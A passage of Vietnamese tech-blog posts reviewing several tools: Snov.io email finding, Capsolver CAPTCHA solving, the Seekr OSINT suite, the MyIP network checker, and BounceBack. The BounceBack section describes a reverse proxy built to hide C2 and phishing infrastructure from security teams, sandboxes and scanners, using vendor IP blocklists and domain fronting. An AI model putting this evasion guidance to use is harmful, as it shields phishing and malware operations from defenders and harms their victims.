• Gửi email đến đúng người nhận giúp tăng khả năng email được đọc và tương tác, mang lại hiệu quả tốt hơn cho chiến dịch marketing của bạn.
• Bạn không cần phải mất thời gian kiểm tra từng địa chỉ email một cách thủ công.

Kết nối Snov.io với các công cụ khác

Snov.io Email Finder có thể kết nối với nhiều công cụ khác, giúp công việc của bạn trở nên thuận tiện hơn:

• Kết nối với CRM để tự động cập nhật danh sách liên lạc và quản lý thông tin khách hàng hiệu quả.
• Kết nối với các công cụ email marketing như Mailchimp để tạo danh sách gửi email và theo dõi hiệu quả.
• Kết hợp với các công cụ tự động hóa marketing để xây dựng quy trình tìm kiếm và liên hệ khách hàng tự động.

Xem thêm: Cách Hacker Bypass AV xâm nhập Windows với Autoit

Hướng dẫn sử dụng Snov.io Email Finder

Sử dụng trên web

Cách dùng rất đơn giản, bạn chỉ cần truy cập trang web của Snov.io > Nhập tên công ty/ website/ tên người > Nhấn ‘Find emails’ là xong.

Sử dụng qua extension

Bạn có thể cài đặt Snov.io Chrome Extension để dễ dàng tìm kiếm các địa chỉ email khi truy cập bất kì website nào

Bước 1: Truy cập trang cài đặt Snov.io Chrome Extension > Nhấn Tải về

Bước 2: Truy cập trang web của công ty bất kì.

Bước 3: Kích hoạt tiện ích Email Finder. Tiện ích này sẽ ngay lập tức bắt đầu quá trình tìm kiếm email, và kết quả sẽ được tổng hợp trong một danh sách riêng mà bạn có thể dễ dàng tùy chỉnh với tiêu đề phù hợp.

Ngoài ra, khi bạn nhấp vào phần ‘Prospects’, bạn có thể khám phá vị trí của các ‘đối tượng tiềm năng’ trong công ty, bạn còn có thể truy cập thông tin mạng xã hội của họ (ví dụ như LinkedIn), giúp bạn có thêm thông tin liên hệ.

Tìm kiếm email miễn phí trên LinkedIn với LI Prospect Finder

Snov.io cũng cung cấp một tiện ích mở rộng Chrome khác – LI Prospect Finder – cho phép bạn tìm kiếm email miễn phí trên LinkedIn. Tiện ích này tích hợp trực tiếp với thanh tìm kiếm LinkedIn, giúp bạn dễ dàng tìm kiếm email mà không cần phải điều chỉnh thủ công.

Bước 1: Để sử dụng, chỉ cần tải xuống LI Prospect Finder > Truy cập LinkedIn và bắt đầu tìm kiếm.

Bước 2: Nhập chức danh công việc của đối tượng tiềm năng, áp dụng các bộ lọc (như People, Jobs, Connections, Locations, hoặc Current Company) > Sau đó kích hoạt tiện ích.

Bước 3: Sau đó, chỉ cần nhấp ‘Save’ để lưu các địa chỉ email đã được xác minh vào một thư mục riêng trong ứng dụng web của Snov.io.

Tại sao lại nói là đã được xác minh? Đó là bởi vì tất cả các công cụ tìm kiếm email của Snov.io đều được trang bị công cụ Email Verifier tích hợp sẵn, giúp bạn không cần phải tự kiểm tra tính hợp lệ của email,

Mỗi email sẽ có 1 chấm tròn màu bên cạnh: Màu xanh lá tức email đã xác minh, màu vàng tức email cần xem xét, và màu đỏ tức là các địa chỉ không tồn tại.

Xem thêm: Hướng dẫn Active Burp Suite Pro 2024 + BugBounty Pro mới nhất

Lời Kết

Snov.io Email Finder không chỉ là một công cụ tìm kiếm email, mà còn là một giải pháp toàn diện giúp bạn kết nối với khách hàng tiềm năng, xây dựng mối quan hệ vững chắc và phát triển doanh nghiệp. Hãy trải nghiệm ngay hôm nay nhé!

Câu hỏi thường gặp

Snov.io Email Finder có hoạt động như thế nào?

Snov.io Email Finder là một công cụ tìm kiếm và xác thực địa chỉ email. Bạn chỉ cần nhập tên công ty, tên miền hoặc hồ sơ LinkedIn, công cụ sẽ tìm kiếm và xác minh các địa chỉ email chính xác, giúp bạn tiết kiệm thời gian và công sức.

Tôi có thể sử dụng Snov.io Email Finder trên thiết bị nào?

Bạn có thể sử dụng Snov.io Email Finder trực tiếp trên website hoặc thông qua tiện ích mở rộng Chrome (extension). Tiện ích mở rộng giúp tìm kiếm email dễ dàng hơn khi bạn đang duyệt web.

Snov.io Email Finder có tích hợp với các công cụ khác không?

Có, Snov.io Email Finder có thể tích hợp với nhiều công cụ khác như CRM và các công cụ email marketing, giúp bạn quản lý thông tin khách hàng và tự động hóa các chiến dịch marketing hiệu quả hơn.

Nỗi “phiền toái” mang tên CAPTCHA

Trong thế giới công nghệ số đang phát triển không ngừng, việc tự động hóa web và thu thập dữ liệu (web scraping) đã trở thành một phần không thể thiếu. Tuy nhiên, CAPTCHA – một hệ thống kiểm tra nhằm phân biệt người dùng thật và bot – lại là một rào cản đáng kể mà nhiều nhà phát triển phải đối mặt.

Cho dù bạn đang xây dựng bot, thu thập dữ liệu hay chỉ đơn giản là cố gắng tự động hóa các tác vụ lặp đi lặp lại trên mạng, CAPTCHA có thể là một trở ngại lớn. Chính vì vậy, Capsolver ra đời như một giải pháp hữu hiệu để vượt qua những khó khăn này.

Xem thêm: DNS Spy: Công cụ phân tích DNS của Domain bất kỳ

Capsolver: Giải pháp tự động giải CAPTCHA hiệu Quả

Capsolver là một dịch vụ tiên tiến được thiết kế để giải quyết CAPTCHA một cách tự động, giúp bạn tiết kiệm thời gian và công sức. Nền tảng này hỗ trợ một loạt các loại CAPTCHA, bao gồm các loại phổ biến như reCAPTCHA, hCaptcha và thậm chí cả các câu đố dựa trên hình ảnh phức tạp.

Điều làm nên sự khác biệt của Capsolver chính là tốc độ và độ chính xác – hai yếu tố quan trọng khi bạn đang xử lý tự động hóa ở quy mô lớn.

Capsolver cung cấp các API dễ sử dụng, cho phép bạn tích hợp khả năng giải quyết CAPTCHA trực tiếp vào các ứng dụng của mình. Cho dù bạn đang làm việc với Python, JavaScript hay bất kỳ ngôn ngữ lập trình nào khác, Capsolver đều cung cấp tài liệu hướng dẫn rõ ràng để giúp bạn bắt đầu nhanh chóng.

Ví dụ: Bạn có thể dễ dàng tích hợp Capsolver vào một bot thu thập dữ liệu sản phẩm trên website thương mại điện tử. Khi bot gặp phải CAPTCHA, nó sẽ tự động gửi yêu cầu đến Capsolver để giải quyết và tiếp tục quá trình thu thập dữ liệu mà không bị gián đoạn.

Link trang chủ Capsolver: https://www.capsolver.com/

Lợi ích khi sử dụng Capsolver

Tiết kiệm thời gian & công sức

Hãy tưởng tượng bạn phải giải quyết hàng trăm, thậm chí hàng nghìn CAPTCHA mỗi ngày. Điều này không chỉ tốn thời gian mà còn gây ra sự mệt mỏi và giảm hiệu suất công việc. Capsolver sẽ tự động hóa quá trình này, giải phóng bạn khỏi những nhiệm vụ lặp đi lặp lại, cho phép bạn tập trung vào những công việc quan trọng hơn.

Nâng cao hiệu quả tự động hóa

Với khả năng giải quyết CAPTCHA nhanh chóng và chính xác, Capsolver giúp tối ưu hóa quy trình tự động hóa của bạn. Bot của bạn sẽ hoạt động trơn tru hơn, thu thập dữ liệu nhanh hơn và hiệu quả hơn.

Chi phí phải chăng

Capsolver áp dụng mô hình thanh toán theo lượt sử dụng, bạn chỉ phải trả tiền cho những CAPTCHA đã được giải quyết. Điều này giúp bạn kiểm soát chi phí hiệu quả, đặc biệt là đối với các dự án nhỏ hoặc hoạt động quy mô lớn.

Hỗ trợ 24/7

Với đội ngũ hỗ trợ chuyên nghiệp 24/7, bạn có thể yên tâm rằng Capsolver luôn sẵn sàng hỗ trợ bạn bất cứ lúc nào, đảm bảo quá trình tự động hóa của bạn diễn ra suôn sẻ.

Xem thêm: Mr Holmes: Công cụ thu thập thông tin dành cho dân OSINT

Lời Kết

Capsolver là một giải pháp toàn diện và hiệu quả để vượt qua rào cản CAPTCHA, giúp bạn tự động hóa các tác vụ trực tuyến một cách dễ dàng và nhanh chóng. Với tốc độ, độ chính xác cao, API dễ sử dụng và chi phí hợp lý, Capsolver là sự lựa chọn tối ưu cho các nhà phát triển, doanh nghiệp và bất kỳ ai muốn tối ưu hóa quy trình tự động hóa của mình.

Câu hỏi thường gặp

Capsolver hỗ trợ những loại CAPTCHA nào?

Capsolver hỗ trợ nhiều loại CAPTCHA phổ biến, bao gồm reCAPTCHA, hCaptcha và cả những câu đố hình ảnh phức tạp.

Tôi có thể tích hợp Capsolver vào ứng dụng của mình như thế nào?

Capsolver cung cấp các API dễ sử dụng, có tài liệu hướng dẫn rõ ràng cho nhiều ngôn ngữ lập trình, giúp bạn tích hợp nhanh chóng và dễ dàng.

Phương thức thanh toán của Capsolver là gì?

Capsolver áp dụng mô hình thanh toán theo lượt sử dụng, bạn chỉ trả tiền cho số lượng CAPTCHA đã được giải quyết.

Giới thiệu về Seekr

Seekr là một bộ công cụ đa năng được thiết kế để thu thập và quản lý dữ liệu OSINT (Open Source Intelligence) thông qua một giao diện web trực quan và dễ sử dụng. Giao diện desktop của Seekr cho phép bạn tích hợp tất cả các công cụ OSINT yêu thích của mình vào một nơi duy nhất.

Được viết bằng ngôn ngữ Go với BadgerDB là cơ sở dữ liệu, Seekr cung cấp một loạt các tính năng mạnh mẽ cho việc thu thập, tổ chức và phân tích dữ liệu. Cho dù bạn là nhà nghiên cứu, điều tra viên hay chỉ đơn giản là người muốn thu thập thông tin, Seekr sẽ giúp bạn dễ dàng tìm kiếm và quản lý dữ liệu cần thiết.

Xem thêm: Hướng dẫn lấy IP người khác bằng Email, QR Code, File Word, Excel, PDF,…

Các tính năng chính của Seekr

• KHÔNG yêu cầu API key cho tất cả các tính năng, giúp tiết kiệm thời gian và công sức cho việc đăng ký và quản lý API key.
• Giao diện Desktop quen thuộc và dễ sử dụng.
• Cơ sở dữ liệu cho các mục tiêu OSINT được lưu trữ và tổ chức một cách hiệu quả.
• Tích hợp / điều chỉnh nhiều công cụ OSINT phổ biến (ví dụ: phoneinfoga)
• Tìm kiếm thông tin liên quan đến địa chỉ email trên GitHub.
• Nhập thông tin bạn có và nhận được đề xuất về các công cụ web hữu ích.
• Thẻ tài khoản cho mỗi người trong cơ sở dữ liệu để quản lý thông tin về các cá nhân một cách chi tiết.
• Tự động tìm kiếm và liên kết các tài khoản trực tuyến.
• Các trường (fields) được xác định trước thường được sử dụng trong cơ sở dữ liệu, giúp tiết kiệm thời gian nhập liệu và đảm bảo tính nhất quán.
• Tùy chỉnh theme và plugin để mở rộng chức năng của Seekr.

Hướng dẫn cài đặt Seekr

Lưu ý: Các bản build không ổn định có thể chứa lỗi và không được khuyến nghị sử dụng trong môi trường sản xuất.

Cài đặt Seekr trên Windows

• Bản ổn định:

Tải xuống và chạy file exe mới nhất tại đây. Sau đó, mở giao diện web trong trình duyệt.

• Bản không ổn định:

Đầu tiên bạn hãy cài đặt TypeScript và Go. Sau đó để cài Seekr trên Windows, hãy chạy các lệnh sau:

git clone https://github.com/seekr-osint/seekr
cd seekr
go generate ./...
tsc --project web
go run main.go

Cài đặt Seekr với Docker

docker pull ghcr.io/seekr-osint/seekr:latest
docker run -p 8569:8569 ghcr.io/seekr-osint/seekr:latest

Cài đặt Seekr trên Linux

• Bản ổn định:

Tải xuống file binary ổn định mới nhất tại đây

• Bản không ổn định:

Đảm bảo bạn đã cài đặt TypeScript và Go. Để cài đặt Seekr trên Linux, hãy chạy các lệnh sau:

git clone https://github.com/seekr-osint/seekr
cd seekr
go generate ./...
tsc --project web
go run main.go

Sau đó, mở giao diện web trong trình duyệt.

Chạy Seekr trên NixOS

Seekr được build với NixOS và hỗ trợ nix flakes. Để chạy Seekr trên NixOS, hãy chạy các lệnh sau:

nix shell github:seekr-osint/seekr
seekr

Cách sử dụng Seekr

Bạn có thể tham khảo hướng dẫn sử dụng công cụ này qua bài viết NÀY

Xem thêm: DNS Spy: Công cụ phân tích DNS của Domain bất kỳ

Lời Kết

Seekr là một công cụ OSINT linh hoạt, cung cấp cho người dùng một giải pháp toàn diện để thu thập, tổ chức và phân tích dữ liệu từ các nguồn mở. Với giao diện thân thiện, tích hợp nhiều công cụ phổ biến và khả năng tùy chỉnh cao, Seekr là lựa chọn lý tưởng cho các nhà nghiên cứu, điều tra viên và bất kỳ ai muốn khai thác sức mạnh của OSINT.

Câu hỏi thường gặp

Seekr có yêu cầu API key nào không?

Không, Seekr không yêu cầu API key cho hầu hết các tính năng của nó, giúp tiết kiệm thời gian và công sức cho người dùng.

Tôi có thể cài đặt Seekr trên hệ điều hành nào?

Seekr hỗ trợ cài đặt trên Windows, Linux và NixOS. Bạn có thể sử dụng cả bản cài đặt ổn định và bản không ổn định (có thể chứa lỗi).

Seekr có dễ sử dụng không?

Seekr được thiết kế với giao diện người dùng trực quan và dễ sử dụng, giúp người dùng dễ dàng thu thập, tổ chức và phân tích dữ liệu OSINT.

Những tính năng chính của MyIP

• Hiển Thị Địa Chỉ IP: Ứng dụng sẽ Xác định và hiển thị các địa chỉ IP cục bộ từ nhiều nhà cung cấp IPv4 và IPv6 khác nhau.
• Thông Tin IP: Cung cấp chi tiết về mọi địa chỉ IP, bao gồm quốc gia, khu vực, ASN, vị trí địa lý, và nhiều thông tin khác.
• Kiểm Tra Tình Khả Dụng: Xác định tính khả dụng của các trang web như Google, GitHub, YouTube, ChatGPT, và nhiều trang khác.
• Phát Hiện WebRTC: Xác định địa chỉ IP sử dụng trong các kết nối WebRTC.
• Kiểm Tra Rò Rỉ DNS: Hiển thị dữ liệu từ điểm cuối DNS để đánh giá nguy cơ rò rỉ DNS khi sử dụng VPN hoặc proxy.
• Kiểm Tra Tốc Độ Mạng: Đánh giá tốc độ kết nối mạng của bạn với các mạng biên.
• Kiểm Tra Quy Tắc Proxy: Kiểm tra các cài đặt quy tắc của phần mềm proxy để đảm bảo chúng hoạt động chính xác.
• Kiểm Tra Độ Trễ Toàn Cầu: Thực hiện các bài kiểm tra độ trễ trên các máy chủ tại các khu vực khác nhau trên thế giới.
• MTR Test: Thực hiện các bài kiểm tra MTR trên các máy chủ tại các khu vực khác nhau trên toàn cầu.
• DNS Resolver: Thực hiện phân giải DNS của một tên miền từ nhiều nguồn khác nhau và thu thập kết quả phân giải thời gian thực để xác định sự nhiễm độc DNS.
• Kiểm Tra Kiểm Duyệt: Kiểm tra xem liệu một trang web có bị chặn ở một số quốc gia hay không.
• Tra Cứu Whois: Thực hiện tra cứu thông tin whois cho tên miền hoặc địa chỉ IP.
• Tra Cứu Địa Chỉ MAC: Truy vấn thông tin của một địa chỉ vật lý.
• Chế Độ Tối: Tự động chuyển đổi giữa chế độ tối và sáng dựa trên cài đặt hệ thống, hoặc bạn có thể chuyển đổi thủ công.
• Chế Độ Tối Giản: Chế độ tối ưu hóa cho di động, rút ngắn độ dài trang để truy cập nhanh các thông tin cần thiết.
• Tra Cứu Thông Tin IP: Cung cấp công cụ tra cứu thông tin về bất kỳ địa chỉ IP nào.
• Hỗ Trợ PWA: Có thể thêm vào như một ứng dụng trên điện thoại hoặc dưới dạng ứng dụng Chrome trên máy tính.
• Phím Tắt: Hỗ trợ phím tắt cho tất cả các chức năng, nhấn ? để xem danh sách phím tắt.
  Dựa trên kết quả kiểm tra khả dụng, chỉ ra liệu kết nối internet toàn cầu có khả thi hay không.
• Hỗ Trợ tiếng Anh, tiếng Trung và tiếng Pháp.

Xem thêm: De digger: Công cụ tìm File của người khác trên Google Drive

Cách sử dụng MyIP

Triển khai MyIP trong môi trường Node

Bước 1: Đầu tiên, đảm bảo bạn đã cài đặt Node.js trước khi thực hiện nhé

Bước 2: Sao chép mã sau:

git clone https://github.com/jason5ng32/MyIP.git

Bước 3: Chạy lệnh sau để cài đặt và build:

npm install && npm run build

Bước 4: Tiến hành chạy chương trình bằng lệnh này:

npm start

Chương trình sẽ chạy trên cổng 18966.

Sử dụng Docker

Nhấp vào Nút ‘Deploy to Docker’ ở đầu trang để hoàn tất việc triển khai.

Hoặc sử dụng lệnh Shell sau:

docker run -d -p 18966:18966 --name myip --restart always jason5ng32/myip:latest

Biến Môi Trường (Environment Variable)

Bạn có thể sử dụng chương trình mà không cần thêm bất kỳ biến môi trường nào, nhưng nếu bạn muốn sử dụng một số tính năng nâng cao, bạn có thể thêm các biến môi trường vào.
Danh sách các biến môi trường bạn có thể tham khảo tại trang Github của MyIP

Sử dụng biến môi trường trong Node.js

Để tùy chỉnh MyIP trong Node.js, bạn có thể sử dụng biến môi trường. Dưới đây là các bước chi tiết:

Bước 1: Để tạo các biến môi trường, bạn có thể làm theo các bước sau:

cp .env.example .env

Bước 2: Sau đó, chỉnh sửa nội dung file .env và thêm các dòng như sau:

BACKEND_PORT=11966
FRONTEND_PORT=18966
BING_MAP_API_KEY="YOUR_KEY_HERE"
ALLOWED_DOMAINS="example.com"
IPCHECKING_API="YOUR_KEY_HERE"

Bước 3: Cuối cùng, khởi động lại dịch vụ backend để áp dụng thay đổi.

Giải thích các biến môi trường:

• BACKEND_PORT: Cổng mà máy chủ backend sẽ lắng nghe.
• FRONTEND_PORT: Cổng mà giao diện người dùng frontend sẽ chạy.
• BING_MAP_API_KEY: Khóa API của Bing Maps, sử dụng cho các tính năng liên quan đến vị trí địa lý.
• ALLOWED_DOMAINS: Danh sách các tên miền được phép truy cập ứng dụng.
• IPCHECKING_API: Khóa API của dịch vụ kiểm tra IP, sử dụng để xác minh địa chỉ IP.

Sử dụng biến môi trường trong Docker

Bạn cũng có thể sử dụng biến môi trường khi chạy MyIP trong Docker. Ví dụ:

docker run -d -p 18966:18966 \
-e BING_MAP_API_KEY="YOUR_KEY_HERE" \
-e ALLOWED_DOMAINS="example.com" \
-e IPCHECKING_API="YOUR_TOKEN_HERE" \
--name myip \
jason5ng32/myip:latest

Cách sử dụng MyIP nâng cao

Nếu bạn đang sử dụng proxy để truy cập internet, hãy cân nhắc thêm quy tắc sau vào cấu hình proxy của mình (chỉnh sửa tùy theo ứng dụng bạn sử dụng). Thiết lập này cho phép bạn kiểm tra cả IP thực và IP khi sử dụng proxy:

# IP Testing
IP-CIDR,1.0.0.1/32,DIRECT,no-resolve
IP-CIDR6,2606:4700:4700::1111/128,DIRECT,no-resolve
DOMAIN-SUFFIX,ipify.org,Proxy
# Rule Testing
DOMAIN,ptest-1.ipcheck.ing,Proxy1
DOMAIN,ptest-2.ipcheck.ing,Proxy2
DOMAIN,ptest-3.ipcheck.ing,Proxy3
DOMAIN,ptest-4.ipcheck.ing,Proxy4
DOMAIN,ptest-5.ipcheck.ing,Proxy5
DOMAIN,ptest-6.ipcheck.ing,Proxy6
DOMAIN,ptest-7.ipcheck.ing,Proxy7
DOMAIN,ptest-8.ipcheck.ing,Proxy8

Giải thích quy tắc Proxy:

• IP-CIDR và IP-CIDR6: Định tuyến các yêu cầu đến các địa chỉ IP cụ thể trực tiếp, không thông qua proxy.
• DOMAIN-SUFFIX: Định tuyến các yêu cầu đến tên miền ipify.org thông qua proxy.
• DOMAIN: Định tuyến các yêu cầu đến các tên miền ptest-*.ipcheck.ing thông qua các proxy khác nhau (Proxy1 đến Proxy8).

Lưu ý: Cấu hình này chỉ là ví dụ, bạn cần điều chỉnh theo cấu hình proxy cụ thể của mình.

Xem thêm: 10 công cụ OSINT mà hacker cần biết

Lời Kết

Tóm lại, MyIP là một công cụ mạnh mẽ và linh hoạt, cung cấp một giải pháp toàn diện để kiểm tra mạng và bảo vệ quyền riêng tư trực tuyến. Với giao diện thân thiện và dễ sử dụng, MyIP là lựa chọn hoàn hảo dành cho người dùng cá nhân và ngay cả chuyên gia.

Câu hỏi thường gặp

MyIP cung cấp những thông tin gì về địa chỉ IP của tôi?

MyIP không chỉ hiển thị địa chỉ IP của bạn mà còn cung cấp thông tin chi tiết như quốc gia, khu vực, ASN, vị trí địa lý và nhiều thông tin khác nữa.

Tôi có cần cài đặt phần mềm nào để sử dụng MyIP?

Không, MyIP là một công cụ trực tuyến, bạn chỉ cần truy cập vào trang web của MyIP để sử dụng các tính năng của nó.

MyIP có hỗ trợ ngôn ngữ nào?

Hiện tại, MyIP hỗ trợ tiếng Anh, tiếng Trung và tiếng Pháp.

Giới thiệu về BounceBack

BounceBack là một reverse proxy mạnh mẽ, có khả năng tùy chỉnh cao và cấu hình linh hoạt, tích hợp chức năng WAF (Web Application Firewall) giúp che giấu hạ tầng C2/phishing của bạn khỏi sự dòm ngó của đội ngũ bảo mật (blue team), sandbox, các công cụ quét,… Nó sử dụng phân tích lưu lượng truy cập thời gian thực thông qua nhiều bộ lọc để ngăn chặn những truy cập bất hợp pháp.

Công cụ này được phân phối kèm theo danh sách các từ bị chặn, địa chỉ IP bị chặn và cho phép cấu hình sẵn. Để biết thêm thông tin về cách sử dụng công cụ, bạn có thể truy cập wiki của dự án dưới đây:

Link Github

Xem thêm: De digger: Công cụ tìm File của người khác trên Google Drive

Các tính năng nổi bật của BounceBack

BounceBack sở hữu nhiều tính năng ưu việt giúp bảo vệ hạ tầng của bạn một cách hiệu quả:

• Hệ thống lọc linh hoạt và tùy biến cao: Với khả năng kết hợp các quy tắc dựa trên boolean (and, or, not), BounceBack có thể che giấu hạ tầng của bạn khỏi những ánh mắt soi mói nhất của đội ngũ bảo mật.
• Cấu trúc dự án dễ dàng mở rộng: Mọi người đều có thể thêm quy tắc cho C2 của riêng mình, giúp tăng tính linh hoạt và khả năng tùy biến.
• Tích hợp danh sách đen IP khổng lồ: Danh sách này bao gồm các dải IP và pool IPv4 được biết là liên quan đến các nhà cung cấp bảo mật IT, kết hợp với bộ lọc IP để ngăn chặn họ sử dụng/tấn công hạ tầng của bạn.
• Trình phân tích cấu hình Malleable C2: BounceBack có thể xác thực lưu lượng HTTP(s) đến dựa trên cấu hình Malleable và từ chối các gói không hợp lệ.
• Hỗ trợ Domain Fronting: Tính năng này giúp bạn che giấu hạ tầng của mình hiệu quả hơn.
• Kiểm tra vị trí địa lý IP: BounceBack có thể kiểm tra địa chỉ IPv4 của yêu cầu so với dữ liệu tra cứu ngược/địa lý IP và so sánh nó với các biểu thức chính quy được chỉ định để loại trừ các kết nối từ bên ngoài các công ty, quốc gia, thành phố, miền, v.v. được phép.
• Bộ lọc thời gian hoạt động: Tất cả các yêu cầu đến có thể được cho phép/không cho phép trong bất kỳ khoảng thời gian nào, vì vậy bạn có thể cấu hình bộ lọc thời gian hoạt động.
• Hỗ trợ nhiều proxy: BounceBack hỗ trợ nhiều proxy với các pipeline lọc khác nhau trên cùng một instance.
• Cơ chế ghi nhật ký chi tiết: Cho phép bạn theo dõi tất cả các yêu cầu đến và sự kiện để phân tích hành vi của đội ngũ bảo mật và gỡ lỗi sự cố.

Cơ chế hoạt động của quy tắc

Ý tưởng chính của các quy tắc là cách BounceBack khớp lưu lượng truy cập. Công cụ hiện hỗ trợ các loại quy tắc sau:

• Kết hợp quy tắc dựa trên Boolean (and, or, not)
• Phân tích IP và subnet
• Kiểm tra các trường vị trí địa lý IP
• Tra cứu ngược miền
• Khớp biểu thức chính quy gói thô
• Xác thực lưu lượng truy cập cấu hình Malleable C2
• Quy tắc giờ làm việc (hoặc không làm việc)
• Quy tắc tùy chỉnh: Có thể dễ dàng thêm các quy tắc tùy chỉnh bằng cách đăng ký RuleBaseCreator hoặc RuleWrapperCreator của bạn. Xem các RuleBaseCreator và RuleWrapperCreator đã được tạo sẵn trong dự án.

Bạn có thể tìm thấy trang cấu hình quy tắc TẠI ĐÂY

Cấu hình Proxy và các giao thức được hỗ trợ

Phần proxy được sử dụng để cấu hình nơi lắng nghe và proxy lưu lượng truy cập, giao thức nào sẽ sử dụng và cách liên kết các quy tắc với nhau để lọc lưu lượng truy cập. Hiện tại, BounceBack hỗ trợ các giao thức sau:

• HTTP(s): Dành cho hạ tầng web của bạn.
• DNS: Dành cho các đường hầm DNS của bạn.
• TCP thô (có hoặc không có tls) và UDP: Dành cho các giao thức tùy chỉnh.
• Giao thức tùy chỉnh: Có thể dễ dàng thêm các giao thức tùy chỉnh bằng cách đăng ký loại mới của bạn trong trình quản lý. Bạn có thể tìm thấy các ví dụ về proxy tại đây.

Bạn có thể tìm thấy trang cấu hình proxy tại trang này.

Hướng dẫn cài đặt BounceBack

Cách 1: Cài đặt từ bản phát hành

Tải xuống bản phát hành mới nhất từ trang này > Giải nén thư mục > Chỉnh sửa file cấu hình > Khởi chạy BounceBack.

Cách 2: Cài đặt từ mã nguồn

Clone dự án (đừng quên GitLFS) > Cài đặt goreleaser > Chạy lệnh:

goreleaser release --clean --snapshot

Cách sử dụng BounceBack

Bước 1 (tùy chọn): Cập nhật danh sách banned_ips.txt:

list:bash scripts/collect_banned_ips.sh > data/banned_ips.txt

Bước 2: Chỉnh sửa config.yml cho nhu cầu: Cấu hình các quy tắc để khớp lưu lượng truy cập, proxy để phân tích lưu lượng truy cập bằng các quy tắc và các biến toàn cục để cấu hình quy tắc chuyên sâu.

Bước 3: Chạy BounceBack: ./bounceback

Các tùy chọn dòng lệnh:

• -c, –config string: Đường dẫn đến tệp cấu hình ở định dạng YAML (mặc định là “config.yml”).
• -l, –log string: Đường dẫn đến tệp nhật ký (mặc định là “bounceback.log”).
• -v, –verbose count: Ghi nhật ký chi tiết (0 = thông tin, 1 = gỡ lỗi, 2+ = theo dõi).

Xem thêm: DNS Spy: Công cụ phân tích DNS của Domain bất kỳ

Lời Kết

BounceBack là một công cụ linh hoạt giúp bảo vệ hạ tầng C2/phishing. Với khả năng tùy chỉnh cao, hệ thống lọc linh hoạt và hỗ trợ đa dạng các giao thức, BounceBack là một lựa chọn lý tưởng để nâng cao an ninh cho hệ thống của bạn.

Câu hỏi thường gặp

BounceBack bảo vệ hạ tầng C2/Phishing như thế nào?

BounceBack hoạt động như một reverse proxy mạnh mẽ, sử dụng hệ thống lọc thông minh và tích hợp WAF để che giấu hạ tầng của bạn khỏi các cuộc tấn công và sự dòm ngó của các công cụ bảo mật. Nó cho phép tùy chỉnh cao và hỗ trợ nhiều giao thức.

Tôi có thể tùy chỉnh BounceBack để phù hợp với nhu cầu của mình không?

Hoàn toàn có thể! BounceBack cho phép tùy chỉnh cao thông qua các quy tắc dựa trên Boolean, khả năng thêm các quy tắc tùy chỉnh, và hỗ trợ nhiều proxy với các pipeline lọc khác nhau.

BounceBack hỗ trợ những giao thức nào?

BounceBack hỗ trợ HTTP(s), DNS, TCP/UDP thô, và cho phép thêm các giao thức tùy chỉnh.